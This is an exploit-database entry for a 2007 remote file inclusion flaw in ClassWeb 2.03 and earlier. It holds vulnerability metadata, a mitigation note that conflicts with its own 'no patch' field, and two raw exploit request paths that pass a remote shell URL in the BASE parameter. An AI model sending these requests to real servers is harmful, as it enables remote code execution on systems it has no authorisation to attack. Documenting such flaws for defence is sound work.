header-logo
Suggest Exploit
vendor:
ClassWeb
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: ClassWeb
Affected Version From: 2.03 and earlier
Affected Version To: 02.03
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ClassWeb <= 2.03 Remote File Include Vulnerabilities

The ClassWeb version 2.03 and earlier is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include a malicious file from a remote server, which can lead to remote code execution.

Mitigation:

Update to the latest version of ClassWeb or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

# ClassWeb <= 2.03 Remote File Include Vulnerabilities
# D.Script: http://sourceforge.net/projects/classweb/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit: 
# [path]/classweb/language.php?BASE=Shell
# [Path]/classweb/phpadmin/survey.php?BASE=Shell

# milw0rm.com [2007-03-22]